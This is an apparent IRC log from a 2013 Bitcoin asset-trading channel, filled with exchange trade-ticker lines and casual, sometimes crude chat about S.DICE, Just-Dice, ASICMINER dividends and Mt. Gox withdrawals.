[BTCTC] [S.BBET-PT] 20 @ 0.0018 = 0.036 BTC [-] Jul 17 21:05:21 [BTCTC] [S.BBET-PT] 20 @ 0.001745 = 0.0349 BTC [-] Jul 17 21:05:22 [BTCTC] [S.BBET-PT] 300 @ 0.001744 = 0.5232 BTC [-] Jul 17 21:05:24 [BTCTC] [S.BBET-PT] 1 @ 0.001743 BTC [-] Jul 17 21:05:25 [BTCTC] [S.BBET-PT] 100 @ 0.0017 = 0.17 BTC [-] Jul 17 21:05:26 [BTCTC] [S.BBET-PT] 50 @ 0.001601 = 0.0801 BTC [-] Jul 17 21:05:29 [BTCTC] [S.BBET-PT] 100 @ 0.0016 = 0.16 BTC [-] Jul 17 21:05:31 [BTCTC] [S.BBET-PT] 25 @ 0.001514 = 0.0379 BTC [-] Jul 17 21:05:33 [BTCTC] [S.BBET-PT] 2 @ 0.00151 = 0.003 BTC [-] Jul 17 21:05:35 [BTCTC] [S.BBET-PT] 46 @ 0.001503 = 0.0691 BTC [-] Jul 17 21:05:37 [BTCTC] [S.BBET-PT] 350 @ 0.001502 = 0.5257 BTC [-] Jul 17 21:05:37 bitbet is only 0.002 on btct, but yes, there is a big arbitrage opportunity for somebody Jul 17 21:05:38 [BTCTC] [S.BBET-PT] 10 @ 0.001501 = 0.015 BTC [-] Jul 17 21:05:38 [BTCTC] [S.BBET-PT] 20 @ 0.0015 = 0.03 BTC [-] Jul 17 21:05:39 Pascale is a common Francophone given name, feminine form of the name Pascal, and an Italian masculine given name, ancient form of Pasquale (Paschale). Jul 17 21:05:39 [BTCTC] [S.BBET-PT] 163 @ 0.001455 = 0.2372 BTC [-] Jul 17 21:05:41 [BTCTC] [S.BBET-PT] 21 @ 0.001455 = 0.0306 BTC [-] Jul 17 21:05:43 perfect. Jul 17 21:05:43 [BTCTC] [S.BBET-PT] 50 @ 0.001452 = 0.0726 BTC [-] Jul 17 21:05:44 [BTCTC] [S.BBET-PT] 188 @ 0.00145 = 0.2726 BTC [-] Jul 17 21:05:45 [BTCTC] [S.BBET-PT] 30 @ 0.001408 = 0.0422 BTC [-] Jul 17 21:05:47 [BTCTC] [S.BBET-PT] 50 @ 0.001406 = 0.0703 BTC [-] Jul 17 21:05:49 [BTCTC] [S.BBET-PT] 10 @ 0.0014 = 0.014 BTC [-] Jul 17 21:05:51 [BTCTC] [S.BBET-PT] 77 @ 0.001337 = 0.1029 BTC [-] Jul 17 21:05:55 lol someone noticed. Jul 17 21:05:56 hai! Jul 17 21:06:04 Hello Jul 17 21:06:09 i got it to load Jul 17 21:06:12 i used tor Jul 17 21:06:16 mmm Jul 17 21:06:18 fuck youtube Jul 17 21:06:23 !t btctc s.bbet-pt Jul 17 21:06:25 [BTCT:S.BBET-PT] 1D: 0.002 / 0.00215 / 0.002179 (736 shares, 1.6 BTC), 7D: 0.001455 / 0.00205 / 0.002179 (1151 shares, 2.4 BTC), 30D: 0.00104 / 0.00174 / 0.002179 (3935 shares, 6.8 BTC) Jul 17 21:06:35 so a page is 1.6 btc ;/ Jul 17 21:06:41 jcpham you're banned on youtube ? Jul 17 21:06:51 don't think so Jul 17 21:07:03 never could get that bitcoin jesus video to load Jul 17 21:07:11 then i switched to my tor proxy Jul 17 21:07:15 and everything was fine Jul 17 21:07:16 [BTCTC] [AMC-PT] 12 @ 0.0025 = 0.03 BTC [+] Jul 17 21:07:34 as fine as things can be when surfing the youtube with tor Jul 17 21:07:43 mircea, there's not much demand at all for S.BBET/S.MPOE Jul 17 21:07:43 !t m s.bbet Jul 17 21:07:44 [MPEX:S.BBET] 1D: 0 / 0 / 0 (0 shares, 0 BTC), 7D: 0.0005505 / 0.00055905 / 0.00056 (20000 shares, 11.18 BTC), 30D: 0.0005505 / 0.00059469 / 0.00085 (24200 shares, 14.39 BTC) Jul 17 21:07:53 S.DICE however is another story. Jul 17 21:08:08 Namworld i take those as the standard and use it to measure the purported venue Jul 17 21:08:12 oops, didn't realize you just did that one Jul 17 21:08:21 not take the purported venue as standard and then use that to measure the actual assets. Jul 17 21:09:03 [BTCTC] [S.DICE-PT] 9 @ 0.002307 = 0.0208 BTC [-] Jul 17 21:09:05 [BTCTC] [S.DICE-PT] 100 @ 0.002297 = 0.2297 BTC [-] Jul 17 21:09:07 [BTCTC] [S.DICE-PT] 500 @ 0.00229 = 1.145 BTC [-] Jul 17 21:09:08 [BTCTC] [S.DICE-PT] 1 @ 0.002285 BTC [-] Jul 17 21:09:09 I notice more S.DICE bids. Jul 17 21:09:10 [BTCTC] [S.DICE-PT] 2 @ 0.002265 = 0.0045 BTC [-] Jul 17 21:09:11 [BTCTC] [S.DICE-PT] 21 @ 0.00225 = 0.0473 BTC [-] Jul 17 21:09:12 [BTCTC] [S.DICE-PT] 100 @ 0.002235 = 0.2235 BTC [-] Jul 17 21:09:14 [BTCTC] [S.DICE-PT] 500 @ 0.00223 = 1.115 BTC [-] Jul 17 21:09:15 [BTCTC] [S.DICE-PT] 150 @ 0.002218 = 0.3327 BTC [-] Jul 17 21:09:16 [BTCTC] [S.DICE-PT] 150 @ 0.002216 = 0.3324 BTC [-] Jul 17 21:09:18 [BTCTC] [S.DICE-PT] 225 @ 0.002215 = 0.4984 BTC [-] Jul 17 21:09:19 wagered: Jul 17 21:09:19 359,194.91961780 Jul 17 21:09:19 site is down: Jul 17 21:09:19 1,641.12313857 Jul 17 21:09:19 [BTCTC] [S.DICE-PT] 174 @ 0.002205 = 0.3837 BTC [-] Jul 17 21:09:20 [BTCTC] [S.DICE-PT] 300 @ 0.002201 = 0.6603 BTC [-] Jul 17 21:09:21 [BTCTC] [S.DICE-PT] 5000 @ 0.0022 = 11 BTC [-] Jul 17 21:09:24 invested: Jul 17 21:09:24 26,645.69507012 Jul 17 21:09:34 Yeah... massive stats... Jul 17 21:09:39 i'd say in spite of everything dooglus' site isn't doing too bad. Jul 17 21:10:06 ;;calc 26645.69507012/0.002 Jul 17 21:10:06 13322847.5351 Jul 17 21:10:18 13.3 million S.DICE shares equivalent. Jul 17 21:10:26 or about the outstanding float Jul 17 21:10:27 iirc Jul 17 21:10:29 [BTCTC] [TAT.ASICMINER] 11 @ 0.041953 = 0.4615 BTC [-] Jul 17 21:10:31 [BTCTC] [TAT.ASICMINER] 150 @ 0.041952 = 6.2928 BTC [-] Jul 17 21:10:40 More invested than 1/10th of S.DICE current value. Jul 17 21:10:54 Of course unlike S.DICE, people can divest instantly. Jul 17 21:10:57 ;;seen mircea_popescu Jul 17 21:10:57 mircea_popescu was last seen in #bitcoin-assets 29 seconds ago: iirc Jul 17 21:11:14 [BTCTC] [ASICMINER-PT] 1 @ 4.445 BTC [+] Jul 17 21:11:18 lol Jul 17 21:12:16 So far it's another month at around 0 for SD. Jul 17 21:12:28 Namworld the following gave me a chuckle yest : dooglus invested some in s.dice, but bought at the peak and then lost w/e, half his investment ? so then he made his own dice site, and lost... 1300 btc. ie way more. Jul 17 21:12:36 asshole bitcoin, it fucks with people's head. Jul 17 21:13:31 an error can be costly. Jul 17 21:13:32 [BTCTC] [ASICMINER-PT] 1 @ 4.448 BTC [+] Jul 17 21:13:35 [BTCTC] [TAT.ASICMINER] 17 @ 0.041955 = 0.7132 BTC [+] Jul 17 21:13:38 [BTCTC] [DMS.MINING] 2 @ 0.0159 = 0.0318 BTC [-] Jul 17 21:13:51 an error can also be unavoidable. Jul 17 21:14:14 [BTCTC] [COGNITIVE] 1 @ 0.974999 BTC [+] Jul 17 21:14:38 [BTCTC] [DMS.SELLING] 20 @ 0.023154 = 0.4631 BTC [-] Jul 17 21:14:40 [BTCTC] [DMS.SELLING] 30 @ 0.023154 = 0.6946 BTC [-] Jul 17 21:15:18 [BTCTC] [DMS.SELLING] 10 @ 0.023153 = 0.2315 BTC [-] Jul 17 21:15:51 [BTCTC] [DMS.MINING] 3 @ 0.0159 = 0.0477 BTC [-] Jul 17 21:16:13 [BTCTC] [DMS.SELLING] 11 @ 0.023151 = 0.2547 BTC [-] Jul 17 21:17:10 [BTCTC] [TAT.ASICMINER] 35 @ 0.04196 = 1.4686 BTC [+] Jul 17 21:17:12 [BTCTC] [TAT.ASICMINER] 33 @ 0.041955 = 1.3845 BTC [-] Jul 17 21:17:14 [BTCTC] [TAT.ASICMINER] 50 @ 0.041951 = 2.0976 BTC [-] Jul 17 21:17:16 [BTCTC] [TAT.ASICMINER] 1 @ 0.04195 BTC [-] Jul 17 21:19:19 [BTCTC] [BASIC-MINING] 2 @ 0.75 = 1.5 BTC [-] Jul 17 21:20:28 I'll need a new MPEx account I believe. Jul 17 21:20:42 [BTCTC] [TAT.ASICMINER] 36 @ 0.04195 = 1.5102 BTC [-] Jul 17 21:21:40 [BTCTC] [TAT.ASICMINER] 20 @ 0.041516 = 0.8303 BTC [-] Jul 17 21:24:35 http://assets.sbnation.com/assets/2925305/flowchart_final_008.png Jul 17 21:24:40 from http://www.theverge.com/2013/7/17/4517480/nsa-spying-prism-surveillance-cheat-sheet Jul 17 21:28:12 ThickAsThieves: good Jul 17 21:36:52 [BTCTC] [AMC-PT] 1 @ 0.0025 BTC [+] Jul 17 21:39:08 [MPEX] [S.MPOE] 12250 @ 0.0008774 = 10.7482 BTC [-] Jul 17 21:40:20 [BTCTC] [DMS.MINING] 48 @ 0.015984 = 0.7672 BTC [+] Jul 17 21:40:21 [BTCTC] [DMS.MINING] 9 @ 0.015989 = 0.1439 BTC [+] Jul 17 21:40:23 [BTCTC] [DMS.MINING] 13 @ 0.01599 = 0.2079 BTC [+] Jul 17 21:45:30 [BTCTC] [DMS.SELLING] 3 @ 0.024297 = 0.0729 BTC [+] Jul 17 21:48:25 [BTCTC] [AMC-PT] 955 @ 0.0025 = 2.3875 BTC [+] Jul 17 21:48:42 [BTCTC] [ASICMINER-PT] 4 @ 4.447899 = 17.7916 BTC [-] Jul 17 21:48:47 [BTCTC] [ASICMINER-PT] 5 @ 4.4479 = 22.2395 BTC [+] Jul 17 21:49:56 [BTCTC] [TAT.ASICMINER] 47 @ 0.042769 = 2.0101 BTC [+] Jul 17 21:49:58 [BTCTC] [TAT.ASICMINER] 38 @ 0.04277 = 1.6253 BTC [+] Jul 17 21:50:51 [BTCTC] [AMC-PT] 1 @ 0.0025 BTC [+] Jul 17 21:51:17 [BTCTC] [AMC-PT] 120 @ 0.0025 = 0.3 BTC [+] Jul 17 21:52:09 [BTCTC] [TAT.ASICMINER] 1 @ 0.04277 BTC [+] Jul 17 21:52:58 [BTCTC] [DMS.MINING] 21 @ 0.015989 = 0.3358 BTC [-] Jul 17 21:53:17 [BTCTC] [BASIC-MINING] 1 @ 0.749999 BTC [-] Jul 17 21:54:13 [BTCTC] [BASIC-MINING] 1 @ 0.75 BTC [+] Jul 17 21:55:17 [BTCTC] [DMS.MINING] 1 @ 0.015989 BTC [-] Jul 17 21:55:45 [BTCTC] [PAJKA.BOND] 1 @ 0.049 BTC [+] Jul 17 21:55:47 [BTCTC] [PAJKA.BOND] 8 @ 0.049 = 0.392 BTC [+] Jul 17 21:56:56 [MPEX] [S.MPOE] 2200 @ 0.00087545 = 1.926 BTC [-] Jul 17 21:57:58 [BTCTC] [ASICMINER-PT] 5 @ 4.2 = 21 BTC [-] Jul 17 21:59:53 Namworld: lost your key? Jul 17 22:00:01 [HAVELOCK] [AM1] [PAID] 13.26690962 BTC to 523 shares, 2536694 satoshi per share Jul 17 22:01:00 tat, sorry for asking you that, but i'm really looking forward for "something" from friedcat. not necessary any announcements, but some lovely words would be enough :) do you knoww if something like that will happen in the next days? internal report for board members is on 23th, right? Jul 17 22:03:12 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.004195 = 0.042 BTC [+] Jul 17 22:04:01 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.004195 = 0.042 BTC [+] Jul 17 22:04:02 [BTCTC] [TAT.VIRTUALMINE] 88 @ 0.004196 = 0.3692 BTC [+] Jul 17 22:04:17 [HAVELOCK] [SDSTM] 60 @ 0.011 = 0.66 BTC [+] Jul 17 22:04:29 [HAVELOCK] [SDSTM] 2 @ 0.011 = 0.022 BTC [+] Jul 17 22:08:10 expectedgoepabo the question would be why. Jul 17 22:08:45 Unfortunately I have no news to share that hasn't already been shared and speculated upon every which way. Jul 17 22:08:59 [BTCTC] [AMC-PT] 12000 @ 0.0025 = 30 BTC [+] Jul 17 22:09:13 [BTCTC] [GSDPT] 2 @ 0.002374 = 0.0047 BTC [+] Jul 17 22:11:00 no but humor me. so you'd like to have some words, even if not an announcement. some lovely words. should the guy write a poem ? Jul 17 22:11:03 are you lonely ? Jul 17 22:11:30 [HAVELOCK] [SDSTM] 9 @ 0.011 = 0.099 BTC [+] Jul 17 22:11:32 [BTCTC] [AMC-PT] 500 @ 0.0025 = 1.25 BTC [+] Jul 17 22:12:07 there is a speculation thread in addition to the main thread, which is largely speculation as well Jul 17 22:12:16 nope, but i know how almost every word let's the crowd cheer and am shares could need more vola imho :p Jul 17 22:12:53 volatility ? Jul 17 22:12:56 why Jul 17 22:14:06 volatility is how traders make money? Jul 17 22:14:34 [BTCTC] [TAT.ASICMINER] 3 @ 0.04276 = 0.1283 BTC [-] Jul 17 22:14:52 so spread some fud Jul 17 22:14:53 maybe Jul 17 22:15:01 or speculate Jul 17 22:15:11 [BTCTC] [AMC-PT] 290 @ 0.0025 = 0.725 BTC [+] Jul 17 22:15:21 begging for me to do so won't help Jul 17 22:15:25 [HAVELOCK] [AM100] [PAID] 60.28895028 BTC to 250`172 shares, 24099 satoshi per share Jul 17 22:16:05 shareholders complain when i relay messages anyway Jul 17 22:16:16 [BTCTC] [AMC-PT] 3 @ 0.0025 = 0.0075 BTC [+] Jul 17 22:17:08 [HAVELOCK] [AM100] 74 @ 0.0412 = 3.0488 BTC [-] Jul 17 22:17:22 aren't the shortsighted selling now right after div? Jul 17 22:17:58 that trick doesn't work every week Jul 17 22:18:09 partic:when divs are higher Jul 17 22:18:14 [HAVELOCK] [AM100] 10 @ 0.0419 = 0.419 BTC [+] Jul 17 22:18:41 [HAVELOCK] [AM100] 3 @ 0.0419 = 0.1257 BTC [+] Jul 17 22:19:50 [HAVELOCK] [AM100] 3 @ 0.0419 = 0.1257 BTC [+] Jul 17 22:19:56 basically everyone is waiting for an excuse to run thw price up past 5 again Jul 17 22:20:12 lol Jul 17 22:20:13 why not 10 ? Jul 17 22:20:25 [HAVELOCK] [AM100] 2 @ 0.0419 = 0.0838 BTC [+] Jul 17 22:20:49 [HAVELOCK] [AM100] 1 @ 0.0417 BTC [-] Jul 17 22:20:57 cuz now they feel like theymissedout selling at 5.25 Jul 17 22:21:07 and will thistime Jul 17 22:21:16 typing while walking sry Jul 17 22:21:42 need to work off some of these btc lbs Jul 17 22:23:09 Made so much off am when it hit 5+ Jul 17 22:23:26 [HAVELOCK] [AM100] 5 @ 0.04100001 = 0.205 BTC [-] Jul 17 22:23:44 i predict this mining crazyness will lead in more drama than glbse Jul 17 22:24:10 [HAVELOCK] [AM100] 2 @ 0.04100001 = 0.082 BTC [-] Jul 17 22:24:35 [HAVELOCK] [AM100] 5 @ 0.041 = 0.205 BTC [-] Jul 17 22:24:42 [BTCTC] [TAT.ASICMINER] 3 @ 0.042758 = 0.1283 BTC [-] Jul 17 22:25:07 [HAVELOCK] [AM100] 1 @ 0.04100001 BTC [+] Jul 17 22:25:18 [HAVELOCK] [AM100] 1 @ 0.04090001 BTC [-] Jul 17 22:26:10 [BTCTC] [AMC-PT] 1 @ 0.0025 BTC [+] Jul 17 22:27:06 [HAVELOCK] [AM100] 4 @ 0.04090001 = 0.1636 BTC [-] Jul 17 22:27:27 FabianB_ how could it not. Jul 17 22:28:25 [BTCTC] [TAT.ASICMINER] 1 @ 0.042758 BTC [-] Jul 17 22:28:55 [HAVELOCK] [AM100] 1 @ 0.04090001 BTC [-] Jul 17 22:29:13 [HAVELOCK] [AM100] 30 @ 0.04100001 = 1.23 BTC [+] Jul 17 22:29:25 [HAVELOCK] [AM100] 200 @ 0.041001 = 8.2002 BTC [+] Jul 17 22:30:56 [BTCTC] [ASICMINER-PT] 1 @ 4.360001 BTC [+] Jul 17 22:32:45 justdice also plays a nice role in curbing AM price shooting up Jul 17 22:32:59 as a high-yield alternative Jul 17 22:33:29 i thought it was under Jul 17 22:33:50 actually if we go by foruminvestor logic, it's under whatever, it should be up wghatever, therefore profit. Jul 17 22:34:34 [HAVELOCK] [AM100] 72 @ 0.041001 = 2.9521 BTC [+] Jul 17 22:35:04 i see they are in the hole again Jul 17 22:35:06 heh Jul 17 22:35:07 -1,614.22894993 Jul 17 22:35:09 [HAVELOCK] [AM100] 3 @ 0.0415 = 0.1245 BTC [+] Jul 17 22:35:16 ;;google i had sex with your mother Jul 17 22:35:17 I had Sex with your Mom - YouTube: ; I Had Sex With Your Mom (The Jerry Springer Show) - YouTube: ; I had sex with your mom. - YouTube: Jul 17 22:35:20 [BTCTC] [AMC-PT] 12 @ 0.0025 = 0.03 BTC [+] Jul 17 22:35:32 i wonder if jerry springer is the next bitcoin jesus. Jul 17 22:36:13 nah, that's a role for the black one Jul 17 22:36:16 what's his name Jul 17 22:36:18 montel Jul 17 22:36:33 he has all these loan commercials n stuff now Jul 17 22:36:56 no credit? no problem! kinda stufff Jul 17 22:37:23 [BTCTC] [COGNITIVE] 1 @ 0.973999 BTC [-] Jul 17 22:37:34 a Jul 17 22:37:44 http://www.youtube.com/watch?v=oTuHQY-07hA Jul 17 22:37:46 Money Mutual "Designed With You In Mind" - Montel Williams - YouTube Jul 17 22:38:04 Get a short term CASH loan of up to $1,000 tomorrow! Jul 17 22:38:10 Get that medical bill PAID! Jul 17 22:38:10 [BTCTC] [COGNITIVE] 2 @ 0.974 = 1.948 BTC [+] Jul 17 22:38:31 [HAVELOCK] [AM100] 1 @ 0.041499 BTC [-] Jul 17 22:38:45 [HAVELOCK] [SDSTM] 1 @ 0.011 BTC [+] Jul 17 22:39:10 [BTCTC] [COGNITIVE] 4 @ 0.9749 = 3.8996 BTC [+] Jul 17 22:40:44 [HAVELOCK] [AM100] 6 @ 0.041499 = 0.249 BTC [-] Jul 17 22:41:15 Montel speaks for the black man Jul 17 22:41:23 hi mircea_popescu, withdrawals please Jul 17 22:41:34 [HAVELOCK] [AM100] 2 @ 0.0415 = 0.083 BTC [+] Jul 17 22:42:24 [HAVELOCK] [AM100] 2 @ 0.0415 = 0.083 BTC [+] Jul 17 22:42:33 [HAVELOCK] [AM100] 1 @ 0.0415 BTC [+] Jul 17 22:42:51 [BTCTC] [AMC-PT] 100 @ 0.0025 = 0.25 BTC [+] Jul 17 22:42:54 [BTCTC] [DMS.MINING] 1 @ 0.0159 BTC [-] Jul 17 22:43:22 [HAVELOCK] [AM100] 2 @ 0.0415 = 0.083 BTC [+] Jul 17 22:44:15 [HAVELOCK] [AM100] 8 @ 0.0415 = 0.332 BTC [+] Jul 17 22:44:35 [MPEX] [S.MPOE] 1000 @ 0.00087545 = 0.8755 BTC [-] Jul 17 22:44:40 J-D at -2000 Jul 17 22:45:49 this will cue the "not having money exactly when they need it" you mentioned Jul 17 22:45:50 whale celeste storming the house again Jul 17 22:46:00 [MPEX] [S.MPOE] 1273 @ 0.0008774 = 1.1169 BTC [+] Jul 17 22:46:03 [MPEX] [S.MPOE] 10333 @ 0.00087745 = 9.0667 BTC [+] Jul 17 22:46:05 [MPEX] [S.MPOE] 1500 @ 0.00087806 = 1.3171 BTC [+] Jul 17 22:46:08 [MPEX] [S.MPOE] 7700 @ 0.00087864 = 6.7655 BTC [+] Jul 17 22:46:11 [MPEX] [S.MPOE] 7511 @ 0.00088185 = 6.6236 BTC [+] Jul 17 22:46:51 [BTCTC] [DMS.SELLING] 17 @ 0.024297 = 0.413 BTC [+] Jul 17 22:47:56 [BTCTC] [DMS.MINING] 5 @ 0.0159 = 0.0795 BTC [-] Jul 17 22:48:27 [BTCTC] [DMS.SELLING] 2 @ 0.024298 = 0.0486 BTC [+] Jul 17 22:48:29 [BTCTC] [DMS.SELLING] 62 @ 0.02449 = 1.5184 BTC [+] Jul 17 22:48:30 [BTCTC] [DMS.SELLING] 60 @ 0.02488 = 1.4928 BTC [+] Jul 17 22:48:31 [BTCTC] [ASICMINER-PT] 1 @ 4.447899 BTC [+] Jul 17 22:48:42 mircea_popescu: How much BTC to buy #bitcoin-anal from you Jul 17 22:49:22 lol Jul 17 22:49:29 you can't think of something else? Jul 17 22:49:45 bitcoin-backdoor? Jul 17 22:49:56 lol Jul 17 22:50:07 bitcoin-buttplug? Jul 17 22:50:50 [BTCTC] [ASICMINER-PT] 1 @ 4.447899 BTC [+] Jul 17 22:51:04 [HAVELOCK] [AM100] 82 @ 0.041894 = 3.4353 BTC [+] Jul 17 22:51:05 [HAVELOCK] [AM100] 82 @ 0.041894 = 3.4353 BTC [+] Jul 17 22:51:07 [HAVELOCK] [AM100] 22 @ 0.041895 = 0.9217 BTC [+] Jul 17 22:51:08 [HAVELOCK] [AM100] 50 @ 0.041896 = 2.0948 BTC [+] Jul 17 22:51:09 [HAVELOCK] [AM100] 50 @ 0.0418999 = 2.095 BTC [+] Jul 17 22:51:10 [HAVELOCK] [AM100] 82 @ 0.0419 = 3.4358 BTC [+] Jul 17 22:51:12 [BTCTC] [DMS.PURCHASE] 36 @ 0.039759 = 1.4313 BTC [-] Jul 17 22:52:06 i proposed #bitcoin-sphincter Jul 17 22:52:36 (and noted it can be opposite of btc faucet) Jul 17 22:52:50 i personally i like #smalltimers-nonsense myself Jul 17 22:53:05 [HAVELOCK] [AM100] 170 @ 0.0419 = 7.123 BTC [+] Jul 17 22:55:25 [HAVELOCK] [AM100] 4 @ 0.042 = 0.168 BTC [+] Jul 17 22:55:55 [BTCTC] [TAT.ASICMINER] 7 @ 0.042757 = 0.2993 BTC [-] Jul 17 22:57:05 J-D at -1000 now, heh Jul 17 22:58:57 [BTCTC] [ASICMINER-PT] 1 @ 4.2 BTC [-] Jul 17 23:00:24 [BTCTC] [TAT.ASICMINER] 43 @ 0.042757 = 1.8386 BTC [-] Jul 17 23:00:27 [BTCTC] [TAT.ASICMINER] 5 @ 0.042758 = 0.2138 BTC [+] Jul 17 23:00:29 [BTCTC] [TAT.ASICMINER] 17 @ 0.04276 = 0.7269 BTC [+] Jul 17 23:00:31 [BTCTC] [TAT.ASICMINER] 20 @ 0.042768 = 0.8554 BTC [+] Jul 17 23:00:34 [BTCTC] [TAT.ASICMINER] 5 @ 0.042771 = 0.2139 BTC [+] Jul 17 23:03:29 Its a good landing channel for those who miss /join #bitcoin-anal Jul 17 23:03:42 who miss joining /join #bitcoin-analysis Jul 17 23:03:53 haha Jul 17 23:03:57 i'll pass on the -anal Jul 17 23:04:05 i imagine that chan should run up some folks for btc trading and what not Jul 17 23:04:32 There's a whole risque market out there for BTC waiting to penetrate Jul 17 23:04:59 [HAVELOCK] [AM100] 35 @ 0.0419 = 1.4665 BTC [-] Jul 17 23:05:25 #bitcoin-anal penetration ftw Jul 17 23:05:28 [BTCTC] [BASIC-MINING] 3 @ 0.75 = 2.25 BTC [+] Jul 17 23:05:41 see, jurov gets it Jul 17 23:05:55 [BTCTC] [AMC-PT] 50 @ 0.0025 = 0.125 BTC [+] Jul 17 23:06:30 [BTCTC] [AMC-PT] 100 @ 0.0025 = 0.25 BTC [+] Jul 17 23:07:37 [HAVELOCK] [AM100] 337 @ 0.0419 = 14.1203 BTC [-] Jul 17 23:08:30 [HAVELOCK] [SDSTM] 5 @ 0.011 = 0.055 BTC [+] Jul 17 23:08:32 [BTCTC] [BTC-BOND] 12 @ 0.009996 = 0.12 BTC [+] Jul 17 23:10:11 [HAVELOCK] [AM100] 1 @ 0.0415 BTC [-] Jul 17 23:10:16 [HAVELOCK] [AM100] 1 @ 0.041012 BTC [-] Jul 17 23:10:35 [HAVELOCK] [AM100] 50 @ 0.04100088 = 2.05 BTC [-] Jul 17 23:10:50 [HAVELOCK] [AM100] 131 @ 0.041001 = 5.3711 BTC [+] Jul 17 23:11:10 [HAVELOCK] [AM100] 71 @ 0.041949 = 2.9784 BTC [+] Jul 17 23:11:19 [HAVELOCK] [AM100] 1 @ 0.0415 BTC [-] Jul 17 23:11:20 [HAVELOCK] [AM100] 184 @ 0.041001 = 7.5442 BTC [-] Jul 17 23:12:27 [BTCTC] [DMS.MINING] 4 @ 0.0159 = 0.0636 BTC [-] Jul 17 23:12:36 [HAVELOCK] [AM1] 4 @ 4.549995 = 18.2 BTC [+] Jul 17 23:12:43 [BTCTC] [AMC-PT] 60 @ 0.0025 = 0.15 BTC [+] Jul 17 23:13:05 [HAVELOCK] [AM100] 6 @ 0.041947 = 0.2517 BTC [+] Jul 17 23:13:18 [HAVELOCK] [AM100] 72 @ 0.041948 = 3.0203 BTC [+] Jul 17 23:13:32 [BTCTC] [TAT.VIRTUALMINE] 2 @ 0.004195 = 0.0084 BTC [-] Jul 17 23:14:14 [HAVELOCK] [AM1] 2 @ 4.55 = 9.1 BTC [+] Jul 17 23:17:12 [HAVELOCK] [AM100] 20 @ 0.041948 = 0.839 BTC [+] Jul 17 23:17:27 [HAVELOCK] [AM100] 2 @ 0.041948 = 0.0839 BTC [+] Jul 17 23:19:44 [BTCTC] [DMS.PURCHASE] 1 @ 0.03772 BTC [-] Jul 17 23:20:35 [BTCTC] [DMS.MINING] 2 @ 0.015989 = 0.032 BTC [+] Jul 17 23:21:36 [HAVELOCK] [AM100] 10 @ 0.04120202 = 0.412 BTC [-] Jul 17 23:21:38 [HAVELOCK] [AM100] 127 @ 0.041201 = 5.2325 BTC [-] Jul 17 23:21:39 [HAVELOCK] [AM100] 143 @ 0.041201 = 5.8917 BTC [-] Jul 17 23:21:45 [HAVELOCK] [AM100] 19 @ 0.041201 = 0.7828 BTC [-] Jul 17 23:21:54 [HAVELOCK] [AM100] 1 @ 0.041948 BTC [+] Jul 17 23:23:06 [MPEX] [S.MPOE] 4550 @ 0.00088185 = 4.0124 BTC [+] Jul 17 23:23:08 [BTCTC] [DMS.SELLING] 20 @ 0.023152 = 0.463 BTC [-] Jul 17 23:23:08 [BTCTC] [DMS.SELLING] 313 @ 0.023151 = 7.2463 BTC [-] Jul 17 23:23:10 [BTCTC] [DMS.SELLING] 32 @ 0.0231 = 0.7392 BTC [-] Jul 17 23:23:13 [BTCTC] [DMS.SELLING] 1 @ 0.0231 BTC [-] Jul 17 23:23:15 [BTCTC] [DMS.SELLING] 100 @ 0.0231 = 2.31 BTC [-] Jul 17 23:23:16 [BTCTC] [DMS.SELLING] 64 @ 0.023 = 1.472 BTC [-] Jul 17 23:24:16 [BTCTC] [S.MPOE-PT] 6 @ 0.000882 = 0.0053 BTC [+] Jul 17 23:25:51 [BTCTC] [COGNITIVE] 6 @ 0.9749 = 5.8494 BTC [+] Jul 17 23:26:09 [HAVELOCK] [SDSTM] 25 @ 0.011 = 0.275 BTC [+] Jul 17 23:28:20 [BTCTC] [DMS.MINING] 2 @ 0.015989 = 0.032 BTC [+] Jul 17 23:32:19 bugpowder Jul 17 23:32:36 [HAVELOCK] [AM100] 5 @ 0.04177778 = 0.2089 BTC [-] Jul 17 23:33:46 can you withdraw from mt gox? Jul 17 23:34:05 [HAVELOCK] [AM100] 5 @ 0.04177778 = 0.2089 BTC [-] Jul 17 23:34:13 i mean, is it possible right now Jul 17 23:34:23 mjr_1: no, you can preorder a withdrawal Jul 17 23:34:37 ugh, wtf is wrong with that company Jul 17 23:35:49 on reddit several ppl asserted that it was their bank that rejected wire from mtgox Jul 17 23:36:08 but mtgox could not communicate it clearly, they had to ask the bank Jul 17 23:36:21 [HAVELOCK] [AM100] 22 @ 0.041942 = 0.9227 BTC [+] Jul 17 23:38:30 hmmm Jul 17 23:38:38 [BTCTC] [AMC-PT] 10 @ 0.0025 = 0.025 BTC [+] Jul 17 23:39:22 22:38:19 (14) dude made 2220 BTC in 25 seconds of betting Jul 17 23:39:54 [BTCTC] [TAT.ASICMINER] 25 @ 0.042211 = 1.0553 BTC [-] Jul 17 23:40:20 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.004195 BTC [-] Jul 17 23:43:32 looks like they quit while ahead this time Jul 17 23:43:47 yep, whale is getting reasonable Jul 17 23:46:24 FabianB, no Jul 17 23:46:42 Wow, that was quite a show on Just-Dice Jul 17 23:46:54 [BTCTC] [TAT.ASICMINER] 3 @ 0.042211 = 0.1266 BTC [-] Jul 17 23:47:34 [BTCTC] [BASIC-MINING] 3 @ 0.722085 = 2.1663 BTC [-] Jul 17 23:47:36 [BTCTC] [BASIC-MINING] 7 @ 0.722084 = 5.0546 BTC [-] Jul 17 23:47:38 [BTCTC] [BASIC-MINING] 1 @ 0.72208 BTC [-] Jul 17 23:47:39 [BTCTC] [BASIC-MINING] 11 @ 0.722 = 7.942 BTC [-] Jul 17 23:47:41 [BTCTC] [BASIC-MINING] 1 @ 0.721 BTC [-] Jul 17 23:47:42 [BTCTC] [BASIC-MINING] 1 @ 0.72 BTC [-] Jul 17 23:47:43 [BTCTC] [BASIC-MINING] 1 @ 0.714 BTC [-] Jul 17 23:47:45 [BTCTC] [BASIC-MINING] 10 @ 0.71 = 7.1 BTC [-] Jul 17 23:47:46 [BTCTC] [BASIC-MINING] 5 @ 0.700212 = 3.5011 BTC [-] Jul 17 23:47:47 [BTCTC] [BASIC-MINING] 5 @ 0.700212 = 3.5011 BTC [-] Jul 17 23:47:49 [BTCTC] [BASIC-MINING] 5 @ 0.700212 = 3.5011 BTC [-] Jul 17 23:47:49 [BTCTC] [BASIC-MINING] 1 @ 0.700211 BTC [-] Jul 17 23:47:50 [BTCTC] [BASIC-MINING] 1 @ 0.7002 BTC [-] Jul 17 23:47:52 [BTCTC] [BASIC-MINING] 8 @ 0.700005 = 5.6 BTC [-] Jul 17 23:47:57 [BTCTC] [TAT.ASICMINER] 13 